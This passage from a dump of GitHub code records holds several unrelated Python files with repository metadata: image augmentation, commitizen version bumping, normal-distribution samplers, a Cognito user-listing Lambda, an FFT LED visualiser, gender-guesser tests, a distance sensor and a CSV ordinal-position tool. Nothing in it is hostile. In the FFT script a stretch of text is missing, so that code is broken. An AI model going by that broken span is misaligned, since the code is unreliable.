es en color o en escala de grises\n if len(img.shape) == 3:\n color = [0,0,0] # Color para los bordes (negro)\n else:\n color = [0] # Color para los bordes (negro)\n \n # Si la imagen es más pequeña, agregar bordes\n if fx < 1.0 or fy < 1.0:\n # Calcular las dimensiones del borde\n top = max(0, int((img.shape[0] - resized.shape[0]) / 2))\n bottom = max(0, int((img.shape[0] - resized.shape[0] + 1) / 2)) # +1 para compensar el redondeo\n left = max(0, int((img.shape[1] - resized.shape[1]) / 2))\n right = max(0, int((img.shape[1] - resized.shape[1] + 1) / 2)) # +1 para compensar el redondeo\n \n # Crear bordes\n resized = cv2.copyMakeBorder(resized, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color)\n \n # Si la imagen es más grande, recortarla\n elif fx > 1.0 or fy > 1.0:\n # Calcular las dimensiones del recorte\n dy = int((resized.shape[0] - img.shape[0]) / 2)\n dx = int((resized.shape[1] - img.shape[1]) / 2)\n \n # Recortar la imagen\n resized = resized[dy:dy+img.shape[0], dx:dx+img.shape[1]]\n \n return resized\n\ndef change_brightness(img, value):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n h, s, v = cv2.split(hsv)\n v = cv2.add(v, value)\n v[v > 255] = 255\n v[v < 0] = 0\n return cv2.cvtColor(cv2.merge((h, s, v)), cv2.COLOR_HSV2BGR)\n\nindex = 0\n\n# Loop de transformación y creación de nuevas imágenes\nfor _ in range(5):\n for mask_file in mask_files:\n try:\n class_name = mask_file.split('\\\\')[1]\n image_file = mask_file.replace('masks', 'Final_dataset_small2').replace('png', 'jpg')\n \n img = cv2.imread(image_file)\n #img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n \n new_img = np.zeros(img.shape, img.dtype)\n\n mask_img = cv2.imread(mask_file, cv2.IMREAD_GRAYSCALE)\n mask_img[mask_img > 0] = class_index[class_name]\n new_img[mask_img > 0] = img[mask_img > 0]\n\n number = random.randint(1, 2)\n\n mask_files_sample = random.sample(mask_files, number)\n except:\n continue\n\n for mask_file2 in mask_files_sample:\n try:\n class_name_2 = mask_file2.split('\\\\')[1]\n img_n = cv2.imread(mask_file2.replace('masks', 'Final_dataset_small2').replace('png', 'jpg'))\n #img_n = cv2.cvtColor(img_n, cv2.COLOR_BGR2RGB)\n mask = cv2.imread(mask_file2, cv2.IMREAD_GRAYSCALE)\n\n tx = random.randint(-80, 80)\n ty = random.randint(-80, 80)\n r = random.randint(-180, 
180)\n fx = random.uniform(0.5, 0.8)\n fy = random.uniform(0.5, 0.8)\n mask = translate_image(mask, tx, ty)\n img_n = translate_image(img_n, tx, ty)\n mask = rotate_image(mask, r)\n img_n = rotate_image(img_n, r)\n mask = scale_image(mask, fx, fy)\n img_n = scale_image(img_n, fx, fy)\n \n #img_n = change_brightness(img_n, random.randint(-50, 50))\n\n mask_indices = mask > 0\n \n new_img[mask_indices] = img_n[mask_indices]\n mask_img[mask_indices] = class_index[class_name_2]\n except:\n pass\n\n # Guardar la imagen aumentada\n try:\n out_name = os.path.join('augmented_images', str(index))\n cv2.imwrite(out_name + '.jpg', new_img)\n cv2.imwrite(out_name + '.png', mask_img)\n index += 1\n except:\n pass\n ","repo_name":"juanmacaaz/ecomate","sub_path":"Pruebas - Otros/data_augmentation.py","file_name":"data_augmentation.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33685730899","text":"import re\nfrom collections import OrderedDict\nfrom itertools import zip_longest\nfrom string import Template\nfrom typing import List, Optional, Union\n\nfrom packaging.version import Version\n\nfrom commitizen.defaults import MAJOR, MINOR, PATCH, bump_message\nfrom commitizen.exceptions import CurrentVersionNotFoundError\nfrom commitizen.git import GitCommit\n\n\ndef find_increment(\n commits: List[GitCommit], regex: str, increments_map: Union[dict, OrderedDict]\n) -> Optional[str]:\n\n if isinstance(increments_map, dict):\n increments_map = OrderedDict(increments_map)\n\n # Most important cases are major and minor.\n # Everything else will be considered patch.\n select_pattern = re.compile(regex)\n increment = None\n\n for commit in commits:\n for message in commit.message.split(\"\\n\"):\n result = select_pattern.search(message)\n if result:\n found_keyword = result.group(0)\n new_increment = None\n for match_pattern in increments_map.keys():\n if re.match(match_pattern, found_keyword):\n new_increment = increments_map[match_pattern]\n break\n\n if increment == \"MAJOR\":\n continue\n elif increment == \"MINOR\" and new_increment == \"MAJOR\":\n increment = new_increment\n elif increment == \"PATCH\" or increment is None:\n increment = new_increment\n\n return increment\n\n\ndef prerelease_generator(current_version: str, prerelease: Optional[str] = None) -> str:\n \"\"\"Generate prerelease\n\n X.YaN # Alpha release\n X.YbN # Beta release\n X.YrcN # Release Candidate\n X.Y # Final\n\n This function might return something like 'alpha1'\n but it will be handled by Version.\n \"\"\"\n if not prerelease:\n return \"\"\n\n version = Version(current_version)\n # version.pre is needed for mypy check\n if version.is_prerelease and version.pre and prerelease.startswith(version.pre[0]):\n prev_prerelease: int = version.pre[1]\n new_prerelease_number = prev_prerelease + 1\n else:\n new_prerelease_number = 0\n pre_version = f\"{prerelease}{new_prerelease_number}\"\n return pre_version\n\n\ndef semver_generator(current_version: str, increment: str = None) -> str:\n version = Version(current_version)\n prev_release = list(version.release)\n increments = [MAJOR, MINOR, PATCH]\n increments_version = dict(zip_longest(increments, prev_release, fillvalue=0))\n\n # This flag means that current version\n # must remove its prerelease tag,\n # so it doesn't matter the increment.\n # Example: 1.0.0a0 with PATCH/MINOR -> 1.0.0\n if not version.is_prerelease:\n\n if increment == MAJOR:\n increments_version[MAJOR] += 1\n 
increments_version[MINOR] = 0\n increments_version[PATCH] = 0\n elif increment == MINOR:\n increments_version[MINOR] += 1\n increments_version[PATCH] = 0\n elif increment == PATCH:\n increments_version[PATCH] += 1\n\n return str(\n f\"{increments_version['MAJOR']}.\"\n f\"{increments_version['MINOR']}.\"\n f\"{increments_version['PATCH']}\"\n )\n\n\ndef generate_version(\n current_version: str,\n increment: str,\n prerelease: Optional[str] = None,\n is_local_version: bool = False,\n) -> Version:\n \"\"\"Based on the given increment a proper semver will be generated.\n\n For now the rules and versioning scheme is based on\n python's PEP 0440.\n More info: https://www.python.org/dev/peps/pep-0440/\n\n Example:\n PATCH 1.0.0 -> 1.0.1\n MINOR 1.0.0 -> 1.1.0\n MAJOR 1.0.0 -> 2.0.0\n \"\"\"\n if is_local_version:\n version = Version(current_version)\n pre_version = prerelease_generator(str(version.local), prerelease=prerelease)\n semver = semver_generator(str(version.local), increment=increment)\n\n return Version(f\"{version.public}+{semver}{pre_version}\")\n else:\n pre_version = prerelease_generator(current_version, prerelease=prerelease)\n semver = semver_generator(current_version, increment=increment)\n\n # TODO: post version\n # TODO: dev version\n return Version(f\"{semver}{pre_version}\")\n\n\ndef update_version_in_files(\n current_version: str, new_version: str, files: List[str], *, check_consistency=False\n) -> None:\n \"\"\"Change old version to the new one in every file given.\n\n Note that this version is not the tag formatted one.\n So for example, your tag could look like `v1.0.0` while your version in\n the package like `1.0.0`.\n \"\"\"\n # TODO: separate check step and write step\n for location in files:\n filepath, *regexes = location.split(\":\")\n regex = regexes[0] if regexes else None\n\n with open(filepath, \"r\") as f:\n version_file = f.read()\n\n if regex:\n current_version_found, version_file = _bump_with_regex(\n version_file, current_version, new_version, regex\n )\n else:\n current_version_regex = _version_to_regex(current_version)\n current_version_found = bool(current_version_regex.search(version_file))\n version_file = current_version_regex.sub(new_version, version_file)\n\n if check_consistency and not current_version_found:\n raise CurrentVersionNotFoundError(\n f\"Current version {current_version} is not found in {location}.\\n\"\n \"The version defined in commitizen configuration and the ones in \"\n \"version_files are possibly inconsistent.\"\n )\n\n # Write the file out again\n with open(filepath, \"w\") as file:\n file.write(\"\".join(version_file))\n\n\ndef _bump_with_regex(version_file_contents, current_version, new_version, regex):\n current_version_found = False\n # Bumping versions that change the string length move the offset on the file contents as finditer keeps a\n # reference to the initial string that was used and calling search many times would lead in infinite loops\n # e.g.: 1.1.9 -> 1.1.20\n offset = 0\n for match in re.finditer(regex, version_file_contents, re.MULTILINE):\n left = version_file_contents[: match.end() + offset]\n right = version_file_contents[match.end() + offset :]\n\n line_break = right.find(\"\\n\")\n middle = right[:line_break]\n right = right[line_break:]\n\n if current_version in middle:\n offset += len(new_version) - len(current_version)\n current_version_found = True\n version_file_contents = (\n left + middle.replace(current_version, new_version) + right\n )\n return current_version_found, 
version_file_contents\n\n\ndef _version_to_regex(version: str):\n clean_regex = version.replace(\".\", r\"\\.\").replace(\"+\", r\"\\+\")\n return re.compile(f\"{clean_regex}\")\n\n\ndef create_tag(version: Union[Version, str], tag_format: Optional[str] = None) -> str:\n \"\"\"The tag and the software version might be different.\n\n That's why this function exists.\n\n Example:\n | tag | version (PEP 0440) |\n | --- | ------- |\n | v0.9.0 | 0.9.0 |\n | ver1.0.0 | 1.0.0 |\n | ver1.0.0.a0 | 1.0.0a0 |\n \"\"\"\n if isinstance(version, str):\n version = Version(version)\n\n if not tag_format:\n return str(version)\n\n major, minor, patch = version.release\n prerelease = \"\"\n # version.pre is needed for mypy check\n if version.is_prerelease and version.pre:\n prerelease = f\"{version.pre[0]}{version.pre[1]}\"\n\n t = Template(tag_format)\n return t.safe_substitute(\n version=version, major=major, minor=minor, patch=patch, prerelease=prerelease\n )\n\n\ndef create_commit_message(\n current_version: Union[Version, str],\n new_version: Union[Version, str],\n message_template: str = None,\n) -> str:\n if message_template is None:\n message_template = bump_message\n t = Template(message_template)\n return t.safe_substitute(current_version=current_version, new_version=new_version)\n","repo_name":"markokow/upwork_scrapers","sub_path":"scraper_env/lib/python3.8/site-packages/commitizen/bump.py","file_name":"bump.py","file_ext":"py","file_size_in_byte":8133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"21281062205","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 5 14:57:31 2020\r\n\r\n@author: Mridul Garg\r\n\"\"\"\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport numpy as np\r\nimport math\r\n\r\ndef PLOT(sequence, text):\r\n plt.hist(sequence, bins = 40, color = \"pink\")\r\n plt.xlabel(\"Bins\")\r\n plt.ylabel(\"Count\")\r\n plt.title(text)\r\n plt.show()\r\n\r\n\r\ndef Normal_0_5(result, text):\r\n n = len(result)\r\n sigma = 5**0.5\r\n mu = 0\r\n for i in range(n):\r\n result[i] = result[i]*5**0.5\r\n \r\n count, bins, ignored = plt.hist(result, bins = 40, color = \"lightblue\", density = True)\r\n plt.plot(bins, 1/(sigma * np.sqrt(2 * np.pi)) *\r\n np.exp( - (bins - mu)**2 / (2 * sigma**2) ), color='darkgreen')\r\n \r\n plt.xlabel(\"Bins\")\r\n plt.ylabel(\"Frequency\")\r\n plt.title(text + \"- N(0, 5)\")\r\n \r\n plt.show()\r\n\r\ndef Normal_5_5(result, text):\r\n n = len(result)\r\n sigma = 5**0.5\r\n mu = 5\r\n for i in range(n):\r\n result[i] = result[i]*5**0.5 + 5 \r\n \r\n count, bins, ignored = plt.hist(result, bins = 40, color = \"lightblue\", density = True)\r\n plt.plot(bins, 1/(sigma * np.sqrt(2 * np.pi)) *\r\n np.exp( - (bins - mu)**2 / (2 * sigma**2) ), color='darkgreen')\r\n \r\n plt.xlabel(\"Bins\")\r\n plt.ylabel(\"Frequency\")\r\n plt.title(text + \"- N(5, 5)\")\r\n \r\n plt.show()\r\n\r\ndef BOX_MULLER(n):\r\n start = time.time()*10000\r\n result = []\r\n \r\n for i in range(n):\r\n u1 = np.random.uniform(0.0, 1.0)\r\n u2 = np.random.uniform(0.0, 1.0)\r\n \r\n R = -2*np.log(u1)\r\n V = 2*np.pi*u2\r\n z1 = (R**0.5)*math.cos(V)\r\n z2 = (R**0.5)*math.sin(V)\r\n \r\n result.append(z1)\r\n result.append(z2)\r\n end = time.time()*10000\r\n print(\"Time elapsed for BOX_MULLER:\", end - start)\r\n print(\"Elements Generated:\", n*2)\r\n print(\"Mean:\", np.mean(result), \", Variance:\", np.var(result))\r\n PLOT(result, \"BOX_MULLER Plot, n = \" + str(2*n))\r\n \r\n Normal_5_5(result[:], 
\"BOX_MULLER\")\r\n Normal_0_5(result[:], \"BOX_MULLER\")\r\n \r\ndef MARSAGLIA_BRAY(n):\r\n start = time.time()*10000\r\n result = []\r\n rejected = 0\r\n \r\n for i in range(n):\r\n# X = 2\r\n while True:\r\n u1 = np.random.uniform(0.0, 1.0)\r\n u2 = np.random.uniform(0.0, 1.0)\r\n u1 = 2*u1 - 1\r\n u2 = 2*u2 - 1\r\n \r\n X = u1**2 + u2**2\r\n \r\n if X > 1:\r\n rejected += 1\r\n else:\r\n break\r\n \r\n Y = (-2*np.log(X)/X)**0.5\r\n z1 = u1*Y\r\n z2 = u2*Y\r\n \r\n result.append(z1)\r\n result.append(z2)\r\n \r\n end = time.time()*10000\r\n print(\"Time elapsed for MARSAGLIA_BRAY:\", end - start)\r\n print(\"Elements Generated:\", n*2)\r\n print(\"Mean:\", np.mean(result), \", Variance:\", np.var(result))\r\n print(\"rejected:\", rejected/(n+rejected), 1 - np.pi/4)\r\n PLOT(result, \"MARSAGLIA_BRAY Plot, n = \" + str(2*n))\r\n \r\n Normal_5_5(result[:], \"MARSAGLIA_BRAY\")\r\n Normal_0_5(result[:], \"MARSAGLIA_BRAY\") \r\n \r\nfor n in [50, 5000]:\r\n BOX_MULLER(n)\r\n print(\"-------------------------------\")\r\n# MARSAGLIA_BRAY(n)\r\n\r\nprint(\"*******************************\")\r\nprint(\"*******************************\")\r\n\r\nfor n in [50, 5000]:\r\n print(\"-------------------------------\")\r\n MARSAGLIA_BRAY(n)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Polymatic/Monte_Carlo_Simulation","sub_path":"Lab05/180123028_Mridul_q1.py","file_name":"180123028_Mridul_q1.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"688100700","text":"import logging\nfrom layers.base import EventBase, ResultBase, Response\nimport boto3\nimport os\n\nLOGGER = logging.getLogger(__name__)\n\ndef handler(e, c):\n event = Event(e, c)\n event.handle()\n return event.response()\n\nclass Result(ResultBase):\n QUERY_SUCCEEDED = (200, \"QUERY SUCCEEDED\", \"Query succeeded\")\n UNKNOWN = (500, \"SERVER_ERROR\", \"Server Error\")\n\nclass Event(EventBase):\n def __init__(self, event, context):\n EventBase.__init__(self, event, context)\n self.__cognito_idp_client = boto3.client('cognito-idp')\n\n def handle(self):\n result, data = self.get_users()\n self._response = Response(result, data).to_json()\n\n def get_users(self):\n response = self.__cognito_idp_client.list_users_in_group(\n UserPoolId = os.environ['COGNITO_POOL_ID'],\n GroupName = self._event['pathParameters']['tenant_id'],\n )\n userArray = []\n for user in response['Users']:\n newUser = {\n 'Username': user['Username'],\n 'Attributes': user['Attributes'],\n 'Enabled': user['Enabled'],\n 'UserStatus': user['UserStatus']\n }\n userArray.append(newUser)\n finalResponse = {\n 'Users': userArray\n }\n return Result.QUERY_SUCCEEDED, finalResponse","repo_name":"nicolasbolanosamazon/AWSomeBuilderProject","sub_path":"services/user_manager/get_users_group/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74093757920","text":"#!/usr/bin/python\nimport json\nimport alsaaudio\nimport numpy as np\nimport collections\nimport sys\nimport time\nimport math\nimport flaschen\n\nrows = 32\ncols = 512\n\nON = (0,255,0)\nRED = (255,0,0)\nOFF = (0,0,0)\n\nft = flaschen.Flaschen('10.1.255.209', 1337, 512, 32, transparent=True, layer=2)\n\nplotMax = 3\noffset = 9\nplotStart = 0\nplotEnd = 1024\nperiodsize = 1500\nbufferLength = 4800\nsampleRate = 44100\nbuffer = 
collections.deque(bufferLength*[0], bufferLength)\n\ninp = alsaaudio.PCM(alsaaudio.PCM_CAPTURE, alsaaudio.PCM_NORMAL, device='default')\ninp.setchannels(1)\ninp.setrate(sampleRate)\ninp.setformat(alsaaudio.PCM_FORMAT_S16_LE)\nperiodsize = inp.setperiodsize(periodsize)\n\nfor i in range(0, int(bufferLength/periodsize)):\n buffer.extend(np.fromstring(inp.read()[1], dtype=\">h\"))\n\nwith open(\"./fft_data\", \"r\") as datafile:\n noiseOffset = json.loads(datafile.read())\n\nwhile True:\n datalength, data = inp.read()\n if (datalength != periodsize):\n continue\n buffer.extend(np.fromstring(data, dtype=\"= y:\n if y >= rows-3:\n ft.set(x,32-y,RED)\n ft.set(x+1,32-y,RED)\n else:\n ft.set(x,32-y,ON)\n ft.set(x+1,32-y,ON)\n else:\n ft.set(x,32-y,OFF)\n ft.set(x+1,32-y,OFF)\n\n ft.send()\n","repo_name":"bitbyt3r/led-stuff","sub_path":"fft2.py","file_name":"fft2.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1175326895","text":"import unittest\nfrom app.dame_genderguesser import DameGenderGuesser\nfrom app.dame_statistics import DameStatistics\nimport collections\ncollections.Callable = collections.abc.Callable\n\n\nclass TddInPythonExample(unittest.TestCase):\n\n def test_genderguesser_list(self):\n dgg = DameGenderGuesser()\n g1 = dgg.guess(\"Sara\", gender_encoded=False)\n self.assertEqual(g1, \"female\")\n g2 = dgg.guess(\"Sara\", gender_encoded=True)\n self.assertEqual(g2, 0)\n g3 = dgg.guess(\"Laura\", gender_encoded=False)\n self.assertEqual(g3, \"female\")\n g4 = dgg.guess(\"Laura\", gender_encoded=True)\n self.assertEqual(g4, 0)\n\n def test_dame_genderguesser_gender_list(self):\n dgg = DameGenderGuesser()\n gl = dgg.csv2gender_list(path=\"files/names/partial.csv\")\n self.assertEqual(gl, [1, 1, 1, 1, 2, 1, 0, 0, 1, 1,\n 2, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1])\n self.assertEqual(len(gl), 21)\n self.assertEqual(dgg.females, 3)\n self.assertEqual(dgg.males, 16)\n self.assertEqual(dgg.unknown, 2)\n\n def test_dame_genderguesser_guess_list(self):\n dgg = DameGenderGuesser()\n self.assertEqual(['male', 'male', 'male', 'male', 'male',\n 'male', 'female', 'female', 'male', 'male'],\n dgg.guess_list(path=\"files/names/partial.csv\",\n gender_encoded=False)[0:10])\n self.assertEqual([1, 1, 1, 1, 1, 1, 0, 0, 1, 1],\n dgg.guess_list(path=\"files/names/partial.csv\",\n gender_encoded=True)[0:10])\n\n def test_dame_genderguesser_accuracy(self):\n dgg = DameGenderGuesser()\n ds = DameStatistics()\n gl1 = dgg.csv2gender_list(path=\"files/names/partial.csv\")\n gl2 = dgg.guess_list(path=\"files/names/partial.csv\",\n gender_encoded=True)\n self.assertTrue(ds.accuracy_score_dame(gl1, gl2) >= 0.5)\n # self.assertTrue(ds.accuracy(path=\"files/names/partial.csv\") >= 0.5)\n\n def test_dame_genderguesser_keyscountries(self):\n dgg = DameGenderGuesser()\n gb = dgg.keyscountries[\"30\"]\n us = dgg.keyscountries[\"32\"]\n self.assertEqual(gb, \"Great Britain\")\n self.assertEqual(us, \"USA\")\n\n def test_dame_genderguesser_keysfrequencies(self):\n dgg = DameGenderGuesser()\n rare = dgg.keysfrequencies[\"1\"]\n extremely_common = dgg.keysfrequencies[\"D\"]\n self.assertEqual(rare, \"rare\")\n self.assertEqual(extremely_common, \"extremely common\")\n 
\n","repo_name":"davidam/damegender","sub_path":"src/damegender/test/test_dame_genderguesser.py","file_name":"test_dame_genderguesser.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"54"} +{"seq_id":"40409528407","text":"#!/usr/bin/env python3\n\nimport RPi.GPIO as GPIO\nimport time\n\nTRIG = 11\nECHO = 12\n\ndef setup():\n\tGPIO.setmode(GPIO.BOARD)\n\tGPIO.setup(ECHO, GPIO.IN)\n\tGPIO.setup(TRIG, GPIO.OUT)\n\tGPIO.output(TRIG, GPIO.HIGH)\n\n\ndef distance():\n\tGPIO.output(TRIG, 0)\n\ttime.sleep(0.000002)\n\n\tGPIO.output(TRIG, 1)\n\ttime.sleep(0.00001)\n\tGPIO.output(TRIG, 0)\n\n\twhile GPIO.input(ECHO) == 0:\n\t\ta = 0\n\ttime1 = time.time()\n\twhile GPIO.input(ECHO) == 1:\n\t\ta = 1\n\ttime2 = time.time()\n\n\tduring = time2 - time1\n\treturn during * 340 / 2 * 100\n\ndef loop():\n\twhile True:\n\t\tdis = distance()\n\t\tprint (int(dis), 'cm')\n\t\tprint ('')\n\t\tif dis < 20:\n\t\t\tbeep(0.5)\n\t\toff()\n\t\ttime.sleep(0.5)\ndef on():\n GPIO.output(TRIG, GPIO.LOW)\n\ndef off():\n GPIO.output(TRIG, GPIO.HIGH)\n\ndef beep(x):\n on()\n time.sleep(x)\n off()\n time.sleep(x)\n\ndef destroy():\n GPIO.output(TRIG, GPIO.HIGH)\n GPIO.cleanup()\n\nif __name__ == \"__main__\":\n\tsetup()\n\toff()\n\ttry:\n\t\tloop()\n\texcept KeyboardInterrupt:\n\t\tdestroy()\n","repo_name":"NoahB7/CS4363-InternetofThingsDevelopment-FacialRecognitionSecuritySystem","sub_path":"Labs/Lab3Combo.py","file_name":"Lab3Combo.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23865713672","text":"#!/bin/python3;\na=\"\"\"\n\n\n\nThis script will insert a row before the first row of the supplied CSV file.\nEach field of this row will contain the numeric value of the ordinal position of the given field.\n\nThis script will also insert a column before the first column of the supplied CSV file.\nThe field of this column will contain the numeric value of the ordinal position of the record it is now part of.\n\n\npushd .;cd /local/data/development.minor/KAUST/BORG/try1;\n\nexport src_csv_dataset_file_name=\"../raw_data/2020-05-03/BORG_DDIEM__clinical_logs.2020-05-03.1213hrs.csv\";\n\nworking_dir_file_name=\"/local/data/tmp/BORG_DDIEM/BORG_DDIEM__parse_clinical_logs_CSV.working_dir\" \\\n && count_of_workers=1 \\\n && log_file_name=\"/local/data/tmp/BORG_DDIEM/logs/BORG_DDIEM__dataset.csv.log.`date +%Y-%m-%d.%H%M.%S.%N.%Z`\" \\\n && echo `date +%Y-%m-%d.%H%M.%S.%N.%Z`\", log_file_name is:'${log_file_name}'\" \\\n && mkdir -p \"$(dirname ${log_file_name})\" \\\n && pushd . 
&& cd /local/data/development.minor/KAUST/BORG/try1 \\\n && PYTHON_HOME=\"/local/data/apps/python/3.8.0\" \\\n && date && time \"${PYTHON_HOME}\"/bin/python3 src/py/clinical_logs_data_transformation/BORG_DDIEM__parse_clinical_logs_CSV.py \\\n -f\"${src_csv_dataset_file_name}\" \\\n -d\"/local/data/development.minor/KAUST/BORG/raw_data\" \\\n --count_of_workers=${count_of_workers} \\\n 2>&1|tee \"${log_file_name}\" \\\n && popd && date;\n \nrm -rf /local/data/development.minor/KAUST/BORG/raw_data/2020-*/.~lock.*\n\n\"\"\";\n\n#from xml.sax import saxutils;\n#import xml.sax;\n\nimport sys;\nimport os;\nimport getopt;\nfrom optparse import OptionParser;\nimport errno;\nimport csv;\nimport re;\nimport time;\nimport json;\nimport logging;\nimport errno;\nimport sys, traceback;\nimport datetime;\nimport socket;\nimport multiprocessing;\n\n\n\n\n\n\nLOG_FORMAT=('%(levelname) -5s processes_id:%(process)d time:%(asctime)s %(name) -10s [%(pathname)s %(module)s %(funcName) '\n '-15s %(lineno) -5d]: %(message)s');\nLOGGER = logging.getLogger(__name__);\n\ndef run_BORG_DDIEM__parse_clinical_logs_CSV(\n w\n ,queue\n ,worker_id\n):\n try:\n w.run();\n queue.put(w._processing_outcome__dict);\n except KeyboardInterrupt:\n d.stop();\nclass BORG_DDIEM__parse_clinical_logs_CSV():\n def __init__(\n self\n ,hostname,ipAddress,ppid\n ,task_id\n ,task_formulation_timestamp\n ,worker_id\n ,worker_number\n ,working_dir_file_name\n ,_srcCSVFileName\n ,_destCSVDirFileName\n ):\n doc=\"\"\"\n an object if this class performs the tranformation of XML to JSON.\n \"\"\";\n self.LOG_FORMAT=('%(levelname) -10s %(asctime)s %(name) -30s %(funcName) '\n '-35s %(lineno) -5d: %(message)s');\n self.logging_level__value=\"INFO\";\n \n self.working_dir_file_name=working_dir_file_name;\n self.hostname=hostname;\n self.ipAddress=ipAddress;\n self.ppid=os.getppid();\n self.pid=os.getpid();\n self.task_formulation_timestamp=task_formulation_timestamp;\n self.task_id=task_id;\n self.worker_id=worker_id;\n self.worker_number=worker_number;\n self._srcCSVFileName=_srcCSVFileName;\n self._destCSVDirFileName=_destCSVDirFileName;\n self._processing_outcome__dict=None;\n \n try:\n if(_srcCSVFileName==None or len(_srcCSVFileName.strip())<0):\n pass;\n raise ValueError(\"_srcCSVFileName is empty the supplied value is '%s'\"%(_srcCSVFileName));\n except ValueError as error:\n #see \"/local/data/BCL_FE_ABI3730_sequencer_plate_data_generator_jobs_data/2018/2018-09/2018-09-20/2018-09-20_171025_103.processing_outcome.json\"\n #LOGGER.info(\" '%s', -------------- cmd is:'%s', row_cnt is:%d\"%(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'),cmd,row_cnt));\n LOGGER.exception(error);\n LOGGER.exception(traceback.format_exc());\n \n raise error;\n def run(self):\n self._processing_outcome__dict=include_ordinal_position_fields(\n self.hostname,self.ipAddress,self.ppid,self.pid\n ,self.working_dir_file_name\n ,self.task_id\n ,self.task_formulation_timestamp\n ,self.worker_id\n ,self.worker_number\n ,self._srcCSVFileName\n ,self._destCSVDirFileName\n );\n LOGGER.info(\"self._processing_outcome__dict is:'%s'\"%(json.dumps(self._processing_outcome__dict,indent=4)));\n def get_processing_outcome(self):\n return self._processing_outcome__dict;\n\ndef include_ordinal_position_fields(\n hostname,ipAddress,ppid,pid\n ,working_dir_file_name\n ,task_id\n ,task_formulation_timestamp\n ,worker_id\n ,worker_number\n ,_srcCSVFileName\n ,_destCSVDirFileName\n):\n pass;\n processing_outcome__dict={};\n task_commencement_time_obj=datetime.datetime.now();\n 
task_commencement_time_str=task_commencement_time_obj.strftime('%Y-%m-%d %H:%M:%S.%f');\n \n \"\"\"\n \"\"\";\n \n src_dataset_csv_file_name=_srcCSVFileName;\n dest_dataset_csv_file_name=os.path.join(\n _destCSVDirFileName\n ,os.path.basename(os.path.dirname(_srcCSVFileName))\n ,\"%s.parsed.csv\"%(os.path.splitext(os.path.basename(_srcCSVFileName))[0])\n );\n LOGGER.info(\"dest_dataset_csv_file_name is:'%s'\"%(dest_dataset_csv_file_name));\n mkdir_p(os.path.dirname(os.path.abspath(dest_dataset_csv_file_name)));\n \n src_dataset_csv_fh=None;\n src_dataset_csv_reader=None;\n src_dataset_csv_fh=open(src_dataset_csv_file_name,\"r\");\n src_dataset_csv_reader=csv.reader(\n src_dataset_csv_fh\n ,delimiter=\",\"\n ,quotechar='\"'\n ,quoting=csv.QUOTE_MINIMAL\n );\n \n dest_dataset_csv_fh=None;\n dest_dataset_csv_writer=None;\n dest_dataset_csv_fh=open(dest_dataset_csv_file_name,\"w\");\n dest_dataset_csv_writer=csv.writer(dest_dataset_csv_fh,delimiter=',',quotechar='\"',quoting=csv.QUOTE_MINIMAL);\n \n row2=[];\n cnt_of_fields__max=0;\n cnt_of_fields=0;\n row_cnt=0;\n src_dataset_csv_fh.seek(0);\n for row in src_dataset_csv_reader:\n row_cnt+=1;\n if(len(row)>cnt_of_fields__max):\n cnt_of_fields__max=len(row);\n del row2[:];\n for i, val in enumerate(row):\n if(row[i]==None):\n row[i]=\"\";\n else:\n row[i]=row[i].strip();\n if(row_cnt==1):\n \"\"\"\n We have the header record, lets generate and insert a row in the destination CSV, the fields of this row would contain the numeric ordinal position of the field.\n \"\"\"\n row2.append(0);\n for i, val in enumerate(row):\n row2.append(i+1);\n dest_dataset_csv_writer.writerow(row2);\n row2=[];\n row2.append(row_cnt-1);\n row2.extend(row[:]);\n dest_dataset_csv_writer.writerow(row2);\n dest_dataset_csv_fh.close();\n src_dataset_csv_fh.close();\n \n \n task_completion_time_obj=datetime.datetime.now();\n task_completion_time_str=\"%s\"%(task_completion_time_obj.strftime('%Y-%m-%d %H:%M:%S.%f'));\n duration_obj=task_completion_time_obj-task_commencement_time_obj;\n duration_ms=duration_obj.total_seconds()*1000;\n \n processing_outcome__dict[\"task_commencement_time_str\"]=task_commencement_time_str;\n processing_outcome__dict[\"task_completion_time_str\"]=task_completion_time_str;\n processing_outcome__dict[\"duration_ms\"]=duration_ms;\n \n processing_outcome__dict[\"hostname\"]=hostname;\n processing_outcome__dict[\"ipAddress\"]=ipAddress;\n processing_outcome__dict[\"ppid\"]=ppid;\n processing_outcome__dict[\"pid\"]=pid;\n processing_outcome__dict[\"task_id\"]=task_id;\n processing_outcome__dict[\"task_formulation_timestamp_str\"]=task_formulation_timestamp.strftime('%Y-%m-%d %H:%M:%S.%f');\n processing_outcome__dict[\"worker_id\"]=worker_id;\n processing_outcome__dict[\"worker_number\"]=worker_number;\n processing_outcome__dict[\"src_dataset_csv_file_name\"]=src_dataset_csv_file_name;\n processing_outcome__dict[\"dest_dataset_csv_file_name\"]=dest_dataset_csv_file_name;\n processing_outcome__dict[\"cnt_of_fields__max\"]=cnt_of_fields__max;\n \n return processing_outcome__dict;\n \n\n \ndef getLocalIPAddress():\n s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);\n s.connect(('google.com',80));\n return s.getsockname()[0];\n\ndef touch(file_name):\n mkdir_p(os.path.abspath(os.path.join(file_name, os.pardir)));\n with 